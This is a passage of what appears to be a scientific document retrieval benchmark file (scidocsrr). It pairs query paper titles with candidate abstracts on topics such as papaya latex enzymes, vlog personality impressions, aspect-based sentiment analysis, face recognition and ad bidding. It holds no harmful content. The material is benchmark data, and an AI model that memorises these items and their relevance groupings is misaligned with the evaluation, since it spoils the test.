"text": "The latex of the tropical species Carica papaya is well known for being a rich source of the four cysteine endopeptidases papain, chymopapain, glycyl endopeptidase and caricain. Altogether, these enzymes are present in the laticifers at a concentration higher than 1 mM. The proteinases are synthesized as inactive precursors that convert into mature enzymes within 2 min after wounding the plant when the latex is abruptly expelled. Papaya latex also contains other enzymes as minor constituents. Several of these enzymes namely a class-II and a class-III chitinase, an inhibitor of serine proteinases and a glutaminyl cyclotransferase have already been purified up to apparent homogeneity and characterized. The presence of a beta-1,3-glucanase and of a cystatin is also suspected but they have not yet been isolated. Purification of these papaya enzymes calls on the use of ion-exchange supports (such as SP-Sepharose Fast Flow) and hydrophobic supports [such as Fractogel TSK Butyl 650(M), Fractogel EMD Propyl 650(S) or Thiophilic gels]. The use of covalent or affinity gels is recommended to provide preparations of cysteine endopeptidases with a high free thiol content (ideally 1 mol of essential free thiol function per mol of enzyme). The selective grafting of activated methoxypoly(ethylene glycol) chains (with M(r) of 5000) on the free thiol functions of the proteinases provides an interesting alternative to the use of covalent and affinity chromatographies especially in the case of enzymes such as chymopapain that contains, in its native state, two thiol functions.",
"title": ""
},
{
"docid": "6a9ab5bca4f995e9649dc0d1f05a03b0",
"text": "With the prevalence of service computing and cloud computing, more and more services are emerging on the Internet, generating huge volume of data, such as trace logs, QoS information, service relationship, etc. The overwhelming service-generated data become too large and complex to be effectively processed by traditional approaches. How to store, manage, and create values from the service-oriented big data become an important research problem. On the other hand, with the increasingly large amount of data, a single infrastructure which provides common functionality for managing and analyzing different types of service-generated big data is urgently required. To address this challenge, this paper provides an overview of service-generated big data and Big Data-as-a-Service. First, three types of service-generated big data are exploited to enhance system performance. Then, Big Data-as-a-Service, including Big Data Infrastructure-as-a-Service, Big Data Platform-as-a-Service, and Big Data Analytics Software-as-a-Service, is employed to provide common big data related services (e.g., accessing service-generated big data and data analytics results) to users to enhance efficiency and reduce cost.",
"title": ""
},
{
"docid": "2ccae5b48fc5ac10f948b79fc4fb6ff3",
"text": "Hierarchical attention networks have recently achieved remarkable performance for document classification in a given language. However, when multilingual document collections are considered, training such models separately for each language entails linear parameter growth and lack of cross-language transfer. Learning a single multilingual model with fewer parameters is therefore a challenging but potentially beneficial objective. To this end, we propose multilingual hierarchical attention networks for learning document structures, with shared encoders and/or shared attention mechanisms across languages, using multi-task learning and an aligned semantic space as input. We evaluate the proposed models on multilingual document classification with disjoint label sets, on a large dataset which we provide, with 600k news documents in 8 languages, and 5k labels. The multilingual models outperform monolingual ones in low-resource as well as full-resource settings, and use fewer parameters, thus confirming their computational efficiency and the utility of cross-language transfer.",
"title": ""
},
{
"docid": "b8d1190ca313019386ed0ffd539a5a93",
"text": "A charge pump that generates positive and negative high voltages with low power-supply voltage and low power consumption was developed. By controlling the body and gate voltage of each transfer HVNMOS, high output voltage can be obtained from a low power-supply voltage. For low power consumption, the clock frequency of the charge pump is varied according to its output voltage. Output voltages of a seven-stage negative charge pump and a five-stage positive charge pump, fabricated with a 0.15- µ m CMOS process, were measured. These measurements show that the developed charge pump achieves the target regulation positive high voltage (+ 6.5 V) and negative high voltage (− 6 V) at low power-supply voltage Vdd of 1.5 V while also achieving low power consumption.",
"title": ""
}
] | scidocsrr |
712d1ac3d688e670b174400b7c91fdfe | You Are Known by How You Vlog: Personality Impressions and Nonverbal Behavior in YouTube | [
{
"docid": "4fd78d1f9737ad996a2e3b4495e911c6",
"text": "The accuracy of Wrst impressions was examined by investigating judged construct (negative aVect, positive aVect, the Big Wve personality variables, intelligence), exposure time (5, 20, 45, 60, and 300 s), and slice location (beginning, middle, end). Three hundred and thirty four judges rated 30 targets. Accuracy was deWned as the correlation between a judge’s ratings and the target’s criterion scores on the same construct. Negative aVect, extraversion, conscientiousness, and intelligence were judged moderately well after 5-s exposures; however, positive aVect, neuroticism, openness, and agreeableness required more exposure time to achieve similar levels of accuracy. Overall, accuracy increased with exposure time, judgments based on later segments of the 5-min interactions were more accurate, and 60 s yielded the optimal ratio between accuracy and slice length. Results suggest that accuracy of Wrst impressions depends on the type of judgment made, amount of exposure, and temporal location of the slice of judged social behavior. © 2007 Elsevier Inc. All rights reserved.",
"title": ""
}
] | [
{
"docid": "e9b2f987c4744e509b27cbc2ab1487be",
"text": "Analogy and similarity are often assumed to be distinct psychological processes. In contrast to this position, the authors suggest that both similarity and analogy involve a process of structural alignment and mapping, that is, that similarity is like analogy. In this article, the authors first describe the structure-mapping process as it has been worked out for analogy. Then, this view is extended to similarity, where it is used to generate new predictions. Finally, the authors explore broader implications of structural alignment for psychological processing.",
"title": ""
},
{
"docid": "3a6e736a2eda12e53f03de9782c75eda",
"text": "Alzheimer's disease (AD) is one of the most common neurodegenerative diseases that influences the central nervous system, often leading to dire consequences for quality of life. The disease goes through some stages mainly divided into early, moderate, and severe. Among them, the early stage is the most important as medical intervention has the potential to alter the natural progression of the condition. In practice, the early diagnosis is a challenge since the neurodegenerative changes can precede the onset of clinical symptoms by 10-15 years. This factor along with other known and unknown ones, hinder the ability for the early diagnosis and treatment of AD. Numerous research efforts have been proposed to address the complex characteristics of AD exploiting various tests including brain imaging that is massively utilized due to its powerful features. This paper aims to highlight our present knowledge on the clinical and computer-based attempts at early diagnosis of AD. We concluded that the door is still open for further research especially with the rapid advances in scanning and computer-based technologies.",
"title": ""
},
{
"docid": "ccc3c2ee7a08eb239443d5773707d782",
"text": "We introduce an iterative normalization and clustering method for single-cell gene expression data. The emerging technology of single-cell RNA-seq gives access to gene expression measurements for thousands of cells, allowing discovery and characterization of cell types. However, the data is confounded by technical variation emanating from experimental errors and cell type-specific biases. Current approaches perform a global normalization prior to analyzing biological signals, which does not resolve missing data or variation dependent on latent cell types. Our model is formulated as a hierarchical Bayesian mixture model with cell-specific scalings that aid the iterative normalization and clustering of cells, teasing apart technical variation from biological signals. We demonstrate that this approach is superior to global normalization followed by clustering. We show identifiability and weak convergence guarantees of our method and present a scalable Gibbs inference algorithm. This method improves cluster inference in both synthetic and real single-cell data compared with previous methods, and allows easy interpretation and recovery of the underlying structure and cell types.",
"title": ""
},
{
"docid": "e0d7d58ebeff18626666143c58fd7377",
"text": "A fundamental challenge in face recognition lies in determining which facial characteristics are important in the identification of faces. Several studies have indicated the significance of certain facial features in this regard, particularly internal ones such as the eyes and mouth. Surprisingly, however, one rather prominent facial feature has received little attention in this domain: the eyebrows. Past work has examined the role of eyebrows in emotional expression and nonverbal communication, as well as in facial aesthetics and sexual dimorphism. However, it has not been made clear whether the eyebrows play an important role in the identification of faces. Here, we report experimental results which suggest that for face recognition the eyebrows may be at least as influential as the eyes. Specifically, we find that the absence of eyebrows in familiar faces leads to a very large and significant disruption in recognition performance. In fact, a significantly greater decrement in face recognition is observed in the absence of eyebrows than in the absence of eyes. These results may have important implications for our understanding of the mechanisms of face recognition in humans as well as for the development of artificial face-recognition systems.",
"title": ""
},
{
"docid": "f333ebc879cf311bfc78297b78839ad9",
"text": "This paper explores the effectiveness of sparse representations obtained by learning a set of overcomplete basis (dictionary) in the context of action recognition in videos. Although this work concentrates on recognizing human movements-physical actions as well as facial expressions-the proposed approach is fairly general and can be used to address other classification problems. In order to model human actions, three overcomplete dictionary learning frameworks are investigated. An overcomplete dictionary is constructed using a set of spatio-temporal descriptors (extracted from the video sequences) in such a way that each descriptor is represented by some linear combination of a small number of dictionary elements. This leads to a more compact and richer representation of the video sequences compared to the existing methods that involve clustering and vector quantization. For each framework, a novel classification algorithm is proposed. Additionally, this work also presents the idea of a new local spatio-temporal feature that is distinctive, scale invariant, and fast to compute. The proposed approach repeatedly achieves state-of-the-art results on several public data sets containing various physical actions and facial expressions.",
"title": ""
},
{
"docid": "b44a9da1f384680742270f6c82ee9e31",
"text": "Person re-identification aims at finding a person of interest in an image gallery by comparing the probe image of this person with all the gallery images. It is generally treated as a retrieval problem, where the affinities between the probe image and gallery images (P2G affinities) are used to rank the retrieved gallery images. However, most existing methods only consider P2G affinities but ignore the affinities between all the gallery images (G2G affinity). Some frameworks incorporated G2G affinities into the testing process, which is not end-to-end trainable for deep neural networks. In this paper, we propose a novel group-shuffling random walk network for fully utilizing the affinity information between gallery images in both the training and testing processes. The proposed approach aims at end-to-end refining the P2G affinities based on G2G affinity information with a simple yet effective matrix operation, which can be integrated into deep neural networks. Feature grouping and group shuffle are also proposed to apply rich supervisions for learning better person features. The proposed approach outperforms state-of-the-art methods on the Market-1501, CUHK03, and DukeMTMC datasets by large margins, which demonstrate the effectiveness of our approach.",
"title": ""
},
{
"docid": "745be5c5d7ce6c0e07382f2287a1ab1c",
"text": "Ninhydrin is the most well known spray reagent for identification of amino acids. Spring with Ninhydrin as a non-specific reagent is well-known and widely used for its remarkable high sensitivity. Using Ninhydrin reagent alone to detect amino acid on thin layer chromatography (TLC) paper is not advisable due to its lower sensitivity. A new spray reagent, Stannus chloride solution (SnCl2) has been used to detect amino acids on filter paper (whitman paper 14) and TLC paper, silica Gel, 60 F254 TLC Aluminum Sheet 20 x 20 cm MerckGermany. Al so, modified TLC pre-staining method was used, which only consisted of 3 steps: spotting, separating and color. The improved method was rapid and inexpensive and the results obtained were clear and reliable. In addition it is suitable for screening different amino acid.",
"title": ""
},
{
"docid": "c8911f38bfd68baa54b49b9126c2ad22",
"text": "This document presents a performance comparison of three 2D SLAM techniques available in ROS: Gmapping, Hec-torSLAM and CRSM SLAM. These algorithms were evaluated using a Roomba 645 robotic platform with differential drive and a RGB-D Kinect sensor as an emulator of a scanner lasser. All tests were realized in static indoor environments. To improve the quality of the maps, some rosbag files were generated and used to build the maps in an off-line way.",
"title": ""
},
{
"docid": "27465b2c8ce92ccfbbda6c802c76838f",
"text": "Nonlinear hyperelastic energies play a key role in capturing the fleshy appearance of virtual characters. Real-world, volume-preserving biological tissues have Poisson’s ratios near 1/2, but numerical simulation within this regime is notoriously challenging. In order to robustly capture these visual characteristics, we present a novel version of Neo-Hookean elasticity. Our model maintains the fleshy appearance of the Neo-Hookean model, exhibits superior volume preservation, and is robust to extreme kinematic rotations and inversions. We obtain closed-form expressions for the eigenvalues and eigenvectors of all of the system’s components, which allows us to directly project the Hessian to semipositive definiteness, and also leads to insights into the numerical behavior of the material. These findings also inform the design of more sophisticated hyperelastic models, which we explore by applying our analysis to Fung and Arruda-Boyce elasticity. We provide extensive comparisons against existing material models.",
"title": ""
},
{
"docid": "496d0bfff9a88dd6c5c6641bad62c0cd",
"text": "Governments envisioning large-scale national egovernment policies increasingly draw on collaboration with private actors, yet the relationship between dynamics and outcomes of public-private partnership (PPP) is still unclear. The involvement of the banking sector in the emergence of a national electronic identification (e-ID) in Denmark is a case in point. Drawing on an analysis of primary and secondary data, we adopt the theoretical lens of collective action to investigate how transformations over time in the convergence of interests, the interdependence of resources, and the alignment of governance models between government and the banking sector shaped the emergence of the Danish national e-ID. We propose a process model to conceptualize paths towards the emergence of public-private collaboration for digital information infrastructure – a common good.",
"title": ""
},
{
"docid": "ffb87dc7922fd1a3d2a132c923eff57d",
"text": "It has been suggested that pulmonary artery pressure at the end of ejection is close to mean pulmonary artery pressure, thus contributing to the optimization of external power from the right ventricle. We tested the hypothesis that dicrotic notch and mean pulmonary artery pressures could be of similar magnitude in 15 men (50 +/- 12 yr) referred to our laboratory for diagnostic right and left heart catheterization. Beat-to-beat relationships between dicrotic notch and mean pulmonary artery pressures were studied 1) at rest over 10 consecutive beats and 2) in 5 patients during the Valsalva maneuver (178 beats studied). At rest, there was no difference between dicrotic notch and mean pulmonary artery pressures (21.8 +/- 12.0 vs. 21.9 +/- 11.1 mmHg). There was a strong linear relationship between dicrotic notch and mean pressures 1) over the 10 consecutive beats studied in each patient (mean r = 0.93), 2) over the 150 resting beats (r = 0.99), and 3) during the Valsalva maneuver in each patient (r = 0.98-0.99) and in the overall beats (r = 0.99). The difference between dicrotic notch and mean pressures was -0.1 +/- 1.7 mmHg at rest and -1.5 +/- 2.3 mmHg during the Valsalva maneuver. Substitution of the mean pulmonary artery pressure by the dicrotic notch pressure in the standard formula of the pulmonary vascular resistance (PVR) resulted in an equation relating linearly end-systolic pressure and stroke volume. The slope of this relation had the dimension of a volume elastance (in mmHg/ml), a simple estimate of volume elastance being obtained as 1.06(PVR/T), where T is duration of the cardiac cycle. In conclusion, dicrotic notch pressure was of similar magnitude as mean pulmonary artery pressure. These results confirmed our primary hypothesis and indicated that human pulmonary artery can be treated as if it is an elastic chamber with a volume elastance of 1.06(PVR/T).",
"title": ""
},
{
"docid": "512add70e73c26a76db5a99cd086e437",
"text": "Early research on online self-presentation mostly focused on identity constructions in anonymous online environments. Such studies found that individuals tended to engage in role-play games and anti-normative behaviors in the online world. More recent studies have examined identity performance in less anonymous online settings such as Internet dating sites and reported different findings. The present study investigates identity construction on Facebook, a newly emerged nonymous online environment. Based on content analysis of 63 Facebook accounts, we find that the identities produced in this nonymous environment differ from those constructed in the anonymous online environments previously reported. Facebook users predominantly claim their identities implicitly rather than explicitly; they ‘‘show rather than tell” and stress group and consumer identities over personally narrated ones. The characteristics of such identities are described and the implications of this finding are discussed. Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "ae20a0ba3b3a5d95a716025391acd1a4",
"text": "This paper summarizes authors' experience with the operation of both versions of autonomous humanoid robot Pepper. The robot's construction, as well as its capabilities and limitations are discussed and compared to the NAO robot. Practical background of working with Pepper robots and several years of experience with NAO, result in specific know-how, which the authors would like to share in this article. It reviews not only the robots' technical aspects, but also practical use-cases that the robot has proven to be perfect for (or not).",
"title": ""
},
{
"docid": "3f45d5b611b59e0bcaa0ff527d11f5af",
"text": "Ensemble methods use multiple models to get better performance. Ensemble methods have been used in multiple research fields such as computational intelligence, statistics and machine learning. This paper reviews traditional as well as state-of-the-art ensemble methods and thus can serve as an extensive summary for practitioners and beginners. The ensemble methods are categorized into conventional ensemble methods such as bagging, boosting and random forest, decomposition methods, negative correlation learning methods, multi-objective optimization based ensemble methods, fuzzy ensemble methods, multiple kernel learning ensemble methods and deep learning based ensemble methods. Variations, improvements and typical applications are discussed. Finally this paper gives some recommendations for future research directions.",
"title": ""
},
{
"docid": "c96e8afc0c3e0428a257ba044cd2a35a",
"text": "The tumor necrosis factor ligand superfamily member receptor activator of nuclear factor-kB (NF-kB) ligand (RANKL), its cellular receptor, receptor activator of NF-kB (RANK), and the decoy receptor, osteoprotegerin (OPG) represent a novel cytokine triad with pleiotropic effects on bone metabolism, the immune system, and endocrine functions (1). RANKL is produced by osteoblastic lineage cells and activated T lymphocytes (2– 4) and stimulates its receptor, RANK, which is located on osteoclasts and dendritic cells (DC) (4, 5). The effects of RANKL within the skeleton include osteoblast –osteoclast cross-talks, resulting in enhanced differentiation, fusion, activation, and survival of osteoclasts (3, 6), while in the immune system, RANKL promotes the survival and immunostimulatory capacity of DC (1, 7). OPG acts as a soluble decoy receptor that neutralizes RANKL, thus preventing activation of RANK (8). The RANKL/RANK/OPG system has been implicated in various skeletal and immune-mediated diseases characterized by increased bone resorption and bone loss, including several forms of osteoporosis (postmenopausal, glucocorticoid-induced, and senile osteoporosis) (9), bone metastases (10), periodontal disease (11), and rheumatoid arthritis (2). While a relative deficiency of OPG has been found to be associated with osteoporosis in various animal models (9), the parenteral administration of OPG to postmenopausal women (3 mg/kg) was beneficial in rapidly reducing enhanced biochemical markers of bone turnover by 30–80% (12). These studies have clearly established the RANKL/ OPG system as a key cytokine network involved in the regulation of bone cell biology, osteoblast–osteoclast and bone-immune cross-talks, and maintenance of bone mass. In addition to providing substantial and detailed insights into the pathogenesis of various metabolic bone diseases, the administration of OPG may become a promising therapeutic option in the prevention and treatment of benign and malignant bone disease. Several studies have attempted to evaluate the clinical relevance and potential applications of serum OPG measurements in humans. Yano et al. were the first to assess systematically OPG serum levels (by an ELISA system) in women with osteoporosis (13). Intriguingly, OPG serum levels were negatively correlated with bone mineral density (BMD) at various sites (lumbar spine, femoral neck, and total body) and positively correlated with biochemical markers of bone turnover. In view of the established protective effects of OPG on bone, these findings came as a surprise, and were interpreted as an insufficient counter-regulatory mechanism to prevent bone loss. Another group which employed a similar design (but a different OPG ELISA system) could not detect a correlation between OPG serum levels and biochemical markers of bone turnover (14), but confirmed the negative correlation of OPG serum concentrations with BMD in postmenopausal women (15). In a recent study, Szulc and colleagues (16) evaluated OPG serum levels in an age-stratified male cohort, and observed positive correlations of OPG serum levels with bioavailable testosterone and estrogen levels, negative correlations with parathyroid hormone (PTH) serum levels and urinary excretion of total deoxypyridinoline, but no correlation with BMD at any site (16). The finding that PTH serum levels and gene expression of OPG by bone cells are inversely correlated was also reported in postmenopausal women (17), and systemic administration of human PTH(1-34) to postmenopausal women with osteoporosis inhibited circulating OPG serum levels (18). Finally, a study of patients with renal diseases showed a decline of serum OPG levels following initiation of systemic glucocorticoid therapy (19). The regulation pattern of OPG by systemic hormones has been described in vitro, and has led to the hypothesis that most hormones and cytokines regulate bone resorption by modulating either RANKL, OPG, or both (9). Interestingly, several studies showed that serum OPG levels increased with ageing and were higher in postmenopausal women (who have an increased rate of bone loss) as compared with men, thus supporting the hypothesis of a counter-regulatory function of OPG in order to prevent further bone loss (13 –16). In this issue of the Journal, Ueland and associates (20) add another important piece to the picture of OPG regulation in humans in vivo. By studying well-characterized patient cohorts with endocrine and immune diseases such as Cushing’s syndrome, acromegaly, growth hormone deficiency, HIV infection, and common variable immunodeficiency (CVI), the investigators reported European Journal of Endocrinology (2001) 145 681–683 ISSN 0804-4643",
"title": ""
},
{
"docid": "a1581dfaaa165f93f4ef9cd8e31d6d6b",
"text": "With increasing number of web services, providing an end-to-end Quality of Service (QoS) guarantee in responding to user queries is becoming an important concern. Multiple QoS parameters (e.g., response time, latency, throughput, reliability, availability, success rate) are associated with a service, thereby, service composition with a large number of candidate services is a challenging multi-objective optimization problem. In this paper, we study the multi-constrained multi-objective QoS aware web service composition problem and propose three different approaches to solve the same, one optimal, based on Pareto front construction and two other based on heuristically traversing the solution space. We compare the performance of the heuristics against the optimal, and show the effectiveness of our proposals over other classical approaches for the same problem setting, with experiments on WSC-2009 and ICEBE-2005 datasets.",
"title": ""
},
{
"docid": "8c09ff5c2ee6da7a2cd4dbdec527aeda",
"text": "Charitable crowdfunding is a burgeoning online micro charity paradigm where fund seekers request micro donations from a large group of potential funders. Despite micro charities have gone digital for more than a decade, our knowledge on individuals’ donation behavior in online micro charities (e.g., charitable crowdfunding) remains limited. To fill this gap, this study develops a model that explains individuals’ donation behavior in charitable crowdfunding. Our model was tested using data collected from 205 individuals who have read charitable crowdfunding projects. The results reveal that empathy and perceived credibility of charitable crowdfunding jointly determine a funder’s intention to donate money. Furthermore, website quality and project content quality positively influence both empathy and perceived credibility. Also noteworthy is that initiator reputation is positively related to perceived credibility while project popularity is positively associated with empathy. The findings contribute to a more nuanced understanding of individuals’ donation behavior in online micro charities.",
"title": ""
},
{
"docid": "bb711ff76d681d3c51e5c667bdb77bf5",
"text": "One of the major problems with electric vehicles is the battery. The battery must be adequately monitored in order to optimize its performances and to maximize its life, to know when it's time to recharge it, or when the charging has been completed, or it's time to buy a new one. The battery's monitoring is the goal of the battery management system (BMS), which must be carefully designed. Moreover, the BMS must report its data to the outer world, and this means that it cannot work alone. If we want to use some kind of simulation to help the design of an effective BMS, we need a simulation model that can be easily attached to other hardware simulation models, such as CAN bus' or Bluetooth models. In this work we present and validate a BMS SystemC simulation model. Both the design and the validation of this BMS are carried on using real-world scenarios and data.",
"title": ""
},
{
"docid": "b7a229f801666b8fdb6ac65321556883",
"text": "INTRODUCTION\nThis in vivo study compared the antibacterial effects of 2 instrumentation systems in root canal-treated teeth with apical periodontitis.\n\n\nMETHODS\nForty-eight teeth with a single root and a single canal showing post-treatment apical periodontitis were selected for this study. For retreatment, teeth were randomly divided into 2 groups according to the instrumentation system used: Self-Adjusting File (SAF; ReDent-Nova, Ra'anana, Israel) and Twisted File Adaptive (TFA; SybronEndo, Orange, CA). In both groups, 2.5% sodium hypochlorite was the irrigant. Bacteriological samples were taken before (S1) and after chemomechanical preparation (S2). In the TFA group, passive ultrasonic irrigation (PUI) was performed after instrumentation, and samples were also taken after this supplementary step (S2b). DNA was extracted from the clinical samples and subjected to quantitative real-time polymerase chain reaction to evaluate the levels of total bacteria, streptococci, and Enterococcus faecalis. Statistical analyses from quantitative real-time polymerase chain reaction data were performed within groups using the Wilcoxon matched pairs test and between groups using the Mann-Whitney U test and the Fisher exact test with the significance level set at P < .05.\n\n\nRESULTS\nBacteria were detected in S1 samples from 43 teeth, which were then included in the antibacterial experiment. Both SAF and TFA instrumentation protocols showed a highly significant intracanal bacterial reduction (P < .001). Intergroup quantitative comparisons disclosed no significant differences between TFA with or without PUI and SAF (P > .05). PUI did not result in significant improvement in disinfection (P > .05).\n\n\nCONCLUSIONS\nBoth instrumentation systems/treatment protocols were highly effective in significantly reducing the intracanal bacterial counts. No significant difference was observed between the 2 systems in disinfecting the canals of teeth with post-treatment apical periodontitis.",
"title": ""
},
{
"docid": "97cb28977a036925fe6d3b00643bea22",
"text": "Along with the blossom of open source projects comes the convenience for software plagiarism. A company, if less self-disciplined, may be tempted to plagiarize some open source projects for its own products. Although current plagiarism detection tools appear sufficient for academic use, they are nevertheless short for fighting against serious plagiarists. For example, disguises like statement reordering and code insertion can effectively confuse these tools. In this paper, we develop a new plagiarism detection tool, called GPLAG, which detects plagiarism by mining program dependence graphs (PDGs). A PDG is a graphic representation of the data and control dependencies within a procedure. Because PDGs are nearly invariant during plagiarism, GPLAG is more effective than state-of-the-art tools for plagiarism detection. In order to make GPLAG scalable to large programs, a statistical lossy filter is proposed to prune the plagiarism search space. Experiment study shows that GPLAG is both effective and efficient: It detects plagiarism that easily slips over existing tools, and it usually takes a few seconds to find (simulated) plagiarism in programs having thousands of lines of code.",
"title": ""
}
] | scidocsrr |
d3de2528dace8261ed384f8d23b293bb | XRCE at SemEval-2016 Task 5: Feedbacked Ensemble Modeling on Syntactico-Semantic Knowledge for Aspect Based Sentiment Analysis | [
{
"docid": "640b6328fe2a44d56fa9d7d2bf61798d",
"text": "This paper describes our participation in SemEval-2015 Task 12, and the opinion mining system sentiue. The general idea is that systems must determine the polarity of the sentiment expressed about a certain aspect of a target entity. For slot 1, entity and attribute category detection, our system applies a supervised machine learning classifier, for each label, followed by a selection based on the probability of the entity/attribute pair, on that domain. The target expression detection, for slot 2, is achieved by using a catalog of known targets for each entity type, complemented with named entity recognition. In the opinion sentiment slot, we used a 3 class polarity classifier, having BoW, lemmas, bigrams after verbs, presence of polarized terms, and punctuation based features. Working in unconstrained mode, our results for slot 1 were assessed with precision between 57% and 63%, and recall varying between 42% and 47%. In sentiment polarity, sentiue’s result accuracy was approximately 79%, reaching the best score in 2 of the 3 domains.",
"title": ""
},
{
"docid": "69d65a994d5b5c412ee6b8a266cb9b31",
"text": "This paper describes our system used in the Aspect Based Sentiment Analysis Task 4 at the SemEval-2014. Our system consists of two components to address two of the subtasks respectively: a Conditional Random Field (CRF) based classifier for Aspect Term Extraction (ATE) and a linear classifier for Aspect Term Polarity Classification (ATP). For the ATE subtask, we implement a variety of lexicon, syntactic and semantic features, as well as cluster features induced from unlabeled data. Our system achieves state-of-the-art performances in ATE, ranking 1st (among 28 submissions) and 2rd (among 27 submissions) for the restaurant and laptop domain respectively.",
"title": ""
}
] | [
{
"docid": "de26ff58b4786fb43dea7271c8eb207d",
"text": "In this paper, we present QSEGMENT, a real-life query segmentation system for eCommerce queries. QSEGMENT uses frequency data from the query log which we call buyers' data and also frequency data from product titles what we call sellers' data. We exploit the taxonomical structure of the marketplace to build domain specific frequency models. Using such an approach, QSEGMENT performs better than previously described baselines for query segmentation. Also, we perform a large scale evaluation by using an unsupervised IR metric which we refer to as user-intent-score. We discuss the overall architecture of QSEGMENT as well as various use cases and interesting observations around segmenting eCommerce queries.",
"title": ""
},
{
"docid": "ee4b8d8e9fdc77ce3f8278f0563d8638",
"text": "A data breakpoint associates debugging actions with programmer-specified conditions on the memory state of an executing program. Data breakpoints provide a means for discovering program bugs that are tedious or impossible to isolate using control breakpoints alone. In practice, programmers rarely use data breakpoints, because they are either unimplemented or prohibitively slow in available debugging software. In this paper, we present the design and implementation of a practical data breakpoint facility.\nA data breakpoint facility must monitor all memory updates performed by the program being debugged. We implemented and evaluated two complementary techniques for reducing the overhead of monitoring memory updates. First, we checked write instructions by inserting checking code directly into the program being debugged. The checks use a segmented bitmap data structure that minimizes address lookup complexity. Second, we developed data flow algorithms that eliminate checks on some classes of write instructions but may increase the complexity of the remaining checks.\nWe evaluated these techniques on the SPARC using the SPEC benchmarks. Checking each write instruction using a segmented bitmap achieved an average overhead of 42%. This overhead is independent of the number of breakpoints in use. Data flow analysis eliminated an average of 79% of the dynamic write checks. For scientific programs such the NAS kernels, analysis reduced write checks by a factor of ten or more. On the SPARC these optimizations reduced the average overhead to 25%.",
"title": ""
},
{
"docid": "4843d4b24161d1dd594d2c0a0fb61ef1",
"text": "Cells release nano-sized membrane vesicles that are involved in intercellular communication by transferring biological information between cells. It is generally accepted that cells release at least three types of extracellular vesicles (EVs): apoptotic bodies, microvesicles and exosomes. While a wide range of putative biological functions have been attributed to exosomes, they are assumed to represent a homogenous population of EVs. We hypothesized the existence of subpopulations of exosomes with defined molecular compositions and biological properties. Density gradient centrifugation of isolated exosomes revealed the presence of two distinct subpopulations, differing in biophysical properties and their proteomic and RNA repertoires. Interestingly, the subpopulations mediated differential effects on the gene expression programmes in recipient cells. In conclusion, we demonstrate that cells release distinct exosome subpopulations with unique compositions that elicit differential effects on recipient cells. Further dissection of exosome heterogeneity will advance our understanding of exosomal biology in health and disease and accelerate the development of exosome-based diagnostics and therapeutics.",
"title": ""
},
{
"docid": "3fdbc95278be466b6ee0906e329a8e49",
"text": "Currently, polymer-based prefillable syringes are being promoted to the pharmaceutical market because they provide an increased break resistance relative to traditionally used glass syringes. Despite this significant advantage, the possibility that barrel material can affect the oligomeric state of the protein drug exists. The present study was designed to compare the effect of different syringe materials and silicone oil lubrication on the protein aggregation. The stability of a recombinant fusion protein, abatacept (Orencia), and a fully human recombinant immunoglobulin G1, adalimumab (Humira), was assessed in silicone oil-free (SOF) and silicone oil-lubricated 1-mL glass syringes and polymer-based syringes in accelerated stress study. Samples were subjected to agitation stress, and soluble aggregate levels were evaluated by size-exclusion chromatography and verified with analytical ultracentrifugation. In accordance with current regulatory expectations, the amounts of subvisible particles resulting from agitation stress were estimated using resonant mass measurement and dynamic flow-imaging analyses. The amount of aggregated protein and particle counts were similar between unlubricated polymer-based and glass syringes. The most significant protein loss was observed for lubricated glass syringes. These results suggest that newly developed SOF polymer-based syringes are capable of providing biopharmaceuticals with enhanced physical stability upon shipping and handling.",
"title": ""
},
{
"docid": "bcf1f9c23e790bda059603f98dcb1fea",
"text": "Hurdle technology is used in industrialized as well as in developing countries for the gentle but effective preservation of foods. Hurdle technology was developed several years ago as a new concept for the production of safe, stable, nutritious, tasty, and economical foods. Previously hurdle technology, i.e., a combination of preservation methods, was used empirically without much knowledge of the governing principles. The intelligent application of hurdle technology has become more prevalent now, because the principles of major preservative factors for foods (e.g., temperature, pH, aw, Eh, competitive flora), and their interactions, became better known. Recently, the influence of food preservation methods on the physiology and behavior of microorganisms in foods, i.e. their homeostasis, metabolic exhaustion, stress reactions, are taken into account, and the novel concept of multi-target food preservation emerged. The present contribution reviews the concept of the potential hurdles for foods, the hurdle effect, and the hurdle technology for the prospects of the future goal of a multi-target preservation of foods.",
"title": ""
},
{
"docid": "0b8ec67f285c4186866f42305dfb7cf2",
"text": "Some deep convolutional neural networks were proposed for time-series classification and class imbalanced problems. However, those models performed degraded and even failed to recognize the minority class of an imbalanced temporal sequences dataset. Minority samples would bring troubles for temporal deep learning classifiers due to the equal treatments of majority and minority class. Until recently, there were few works applying deep learning on imbalanced time-series classification (ITSC) tasks. Here, this paper aimed at tackling ITSC problems with deep learning. An adaptive cost-sensitive learning strategy was proposed to modify temporal deep learning models. Through the proposed strategy, classifiers could automatically assign misclassification penalties to each class. In the experimental section, the proposed method was utilized to modify five neural networks. They were evaluated on a large volume, real-life and imbalanced time-series dataset with six metrics. Each single network was also tested alone and combined with several mainstream data samplers. Experimental results illustrated that the proposed costsensitive modified networks worked well on ITSC tasks. Compared to other methods, the cost-sensitive convolution neural network and residual network won out in the terms of all metrics. Consequently, the proposed cost-sensitive learning strategy can be used to modify deep learning classifiers from cost-insensitive to costsensitive. Those cost-sensitive convolutional networks can be effectively applied to address ITSC issues.",
"title": ""
},
{
"docid": "604957d090fa49a1de23e22304c297d1",
"text": "This paper describes the development of a test bed for an on-drone computation system, in which the drone plays the game of ping-pong competitively (YCCD: The Yorktown Cognitive Competition Drone). Unlike other drone systems and demonstrators YCCD will be completely autonomous with no external support from cameras, servers, GPS etc. YCCD will have ultra-low power computation capabilities including on-drone real-time processing for vision and localization (non-GPS based). Architectural design and processing algorithms of the system are discussed in detail.",
"title": ""
},
{
"docid": "bf445955186e2f69f4ef182850090ffc",
"text": "The majority of online display ads are served through real-time bidding (RTB) --- each ad display impression is auctioned off in real-time when it is just being generated from a user visit. To place an ad automatically and optimally, it is critical for advertisers to devise a learning algorithm to cleverly bid an ad impression in real-time. Most previous works consider the bid decision as a static optimization problem of either treating the value of each impression independently or setting a bid price to each segment of ad volume. However, the bidding for a given ad campaign would repeatedly happen during its life span before the budget runs out. As such, each bid is strategically correlated by the constrained budget and the overall effectiveness of the campaign (e.g., the rewards from generated clicks), which is only observed after the campaign has completed. Thus, it is of great interest to devise an optimal bidding strategy sequentially so that the campaign budget can be dynamically allocated across all the available impressions on the basis of both the immediate and future rewards. In this paper, we formulate the bid decision process as a reinforcement learning problem, where the state space is represented by the auction information and the campaign's real-time parameters, while an action is the bid price to set. By modeling the state transition via auction competition, we build a Markov Decision Process framework for learning the optimal bidding policy to optimize the advertising performance in the dynamic real-time 